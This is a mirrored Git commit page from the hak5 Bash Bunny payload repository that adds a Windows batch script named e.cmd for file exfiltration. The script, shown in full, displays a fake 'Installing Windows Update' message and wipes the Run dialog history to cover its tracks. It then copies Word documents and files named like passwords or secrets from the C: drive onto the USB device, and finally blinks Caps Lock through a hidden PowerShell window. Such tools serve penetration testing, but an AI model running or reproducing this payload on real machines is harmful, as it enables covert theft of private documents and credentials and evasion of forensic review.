hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Added SmartFileExtract payload (#296)

Browse Source
This commit is contained in:
saintcrossbow
2017-11-26 20:16:17 -05:00
committed by Sebastian Kinne
parent 53cf608b7f
commit 08c24c4389
6 changed files with 86 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

25
payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd Normal file
View File

@@ -0,0 +1,25 @@
REM Setup required:
REM o Create SFE in the loot directory
REM o Place SmartFileExtract on the root of the bashbunny
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit